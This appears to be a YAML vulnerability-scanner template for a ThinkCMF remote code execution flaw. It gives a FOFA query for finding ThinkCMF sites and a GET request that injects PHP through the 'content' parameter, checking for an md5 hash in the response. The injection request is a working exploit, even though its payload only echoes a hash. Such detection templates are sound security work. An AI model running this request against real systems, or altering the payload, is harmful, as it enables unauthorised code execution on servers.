product: ThinkCMF
vName: ThinkCMF Remote Code Execution
type: 代码执行
vID: [ ]
level: 3
vDesc: ThinkCMF is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
version: ''
note: ''
search:
  FOFA: app="ThinkCMF"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /index.php?g=g&m=Door&a=index&content=<?php%20echo%20md5('ThinkCMF');
    verify:
      logic: and
      check:
        - body:
            value:
              - d9b2c63a497e2f30c4ad9ad083a00691
            logic: and
        - status: 200